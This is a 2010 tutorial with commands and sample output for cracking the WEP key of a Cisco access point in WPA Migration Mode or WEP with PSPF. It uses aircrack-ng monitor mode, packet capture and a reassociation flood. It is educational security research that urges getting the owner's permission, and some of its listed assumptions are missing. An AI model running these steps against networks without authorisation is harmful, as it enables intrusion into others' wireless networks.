Version: 1.0 August 11, 2010
By: Leandro Meiners and Diego Sor
This tutorial walks you through attacking an access point with PSPF enabled. The access point can be configured in WPA Migration Mode or as a WEP access point. It assumes you have a working wireless card with drivers already patched for injection.
For a comprehensive analysis about the technical details of the attacks, see the presentation and whitepaper “WPA Migration Mode: WEP is back to haunt you…” at http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=WPA_MIGRATION_MODE.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool, and darkAudax for writing the tutorials which we used as a basis.
Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
First, this solution assumes:
Ensure all of the above assumptions are true; otherwise the advice that follows will not work. In the examples below, you will need to change “wlan0” to the interface name which is specific to your wireless card.
In this tutorial, here is what was used:
You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network broadcast traffic (which will be WEP-encapsulated) and saving them. Since none of us are patient, this technique allows us to force the access point into sending WEP encrypted traffic. This allows us to capture a large number of IVs in a short period of time.
When an access point is configured with PSPF enabled, traffic from a wireless station to a wireless station is not forwarded by the access point. Therefore, traditional attacks against the access point (replaying an ARP frame, chop-chop, and fragmentation) will not work. Under this constraint it is necessary to attack a WEP station directly (without going through the access point), see: http://aircrack-ng.org/doku.php?id=how_to_crack_wep_via_a_wireless_client
This is an alternate approach that can be used in this scenario against a Cisco access point configured in WPA Migration Mode or WEP with PSPF enabled.
Once we have captured a large number of IVs, we can use them to determine the WEP key.
Here are the basic steps we will be going through:
The following link points to a video of the attack: http://www.youtube.com/watch?v=9L4lYAX04ho
The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets.
Enter the following command to start the wireless card on channel 8 in monitor mode:
# airmon-ng start wlan0 8
Substitute the channel number that your AP runs on for “8” in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.
The system will respond:
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy1] (monitor mode enabled on mon0)
You will notice that “mon0” is reported above as being put into monitor mode.
To confirm the interface is properly setup, enter “iwconfig”.
The system will respond:
lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11abg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off mon0 IEEE 802.11abg Mode:Monitor Frequency:2.447 GHz Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:off
In the response above, you can see that mon0 is in monitor mode, on the 2.447GHz frequency which is channel 8 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.
To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.
Open another console session to capture the generated IVs. Then enter:
# airodump-ng -c 8 --bssid 00:26:0B:2A:BA:40 -w output mon0
While the injection is taking place (later), the screen will look similar to this:
CH 8 ][ Elapsed: 12 s ][ 2010-08-11 12:52 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:0B:2A:BA:40 -17 100 143 89 7 8 54e. WPA TKIP PSK migrate BSSID STATION PWR Rate Lost Packets Probes 00:26:0B:2A:BA:40 00:1F:3C:4E:88:46 0 54 - 1 1062 1155
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
Continuously sending reassociation requests to the Cisco access point, will trigger the AP to send WEP-encapsulated WLLCP (Cisco Wireless LAN Context Control Protocol) frames, which can be used to recover the WEP key.
To associate with an access point, use fake authentication:
aireplay-ng -1 0 -Q -e migrate –a 00:26:0B:2A:BA:40 -h 00:1f:3c:4e:88:46 mon0
Success looks like:
12:52:50 Waiting for beacon frame (BSSID: 00:26:0B:2A:BA:40) on channel 8 12:52:50 Sending Authentication Request (Open System) [ACK] 12:52:50 Authentication successful 12:52:50 Sending Association Request [ACK] 12:52:50 Association successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) 12:52:50 Sending Reassociation Request [ACK] 12:52:50 Reassociation successful :-) (AID: 1) [...]
If you get a deauthentication packet, try again. Do not proceed to the next step until you have the fake authentication running correctly.
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Start another console session and enter:
aircrack-ng -a 1 -b 00:26:0B:2A:BA:40 output*.cap
Here is what success looks like:
Aircrack-ng 1.2 [00:00:00] Tested 763 keys (got 47981 IVs) KB depth byte(vote) 0 1/ 3 EF(59904) F8(56320) 25(56064) 56(55552) D0(55552) 58(55296) 74(54528) FA(54528) 7D(54272) 86(53760) C7(53504) E7(53504) ED(53504) B0(53248) B9(53248) D7(53248) 1 3/ 5 99(56576) AA(56320) 6E(55552) 1A(55040) 25(55040) 3D(55040) 50(55040) 87(55040) 61(54784) 71(54784) D9(54528) 60(54272) BB(54272) F8(54272) 24(54016) E6(54016) 2 20/ 2 51(52992) 5F(52736) 7C(52736) 8F(52736) C5(52736) 23(52480) 76(52480) 77(52480) B5(52480) DD(52480) 47(52224) 5C(52224) 53(51968) D3(51968) DE(51968) 0B(51712) 3 0/ 1 B9(69120) 3B(57856) B0(57344) 53(55808) A2(55808) 96(55296) E4(55296) 5D(54784) D5(54784) 6E(54528) 38(54272) 65(54272) 4C(54016) 78(54016) F6(54016) 21(53760) 4 7/ 4 32(56576) 95(55808) 4D(54528) 82(54528) AE(54272) 0F(53760) 39(53760) B0(53760) F5(53760) 6E(53504) 97(53504) 11(53248) A1(53248) B3(53248) 5C(52992) 20(52736) KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA ] Decrypted correctly: 100%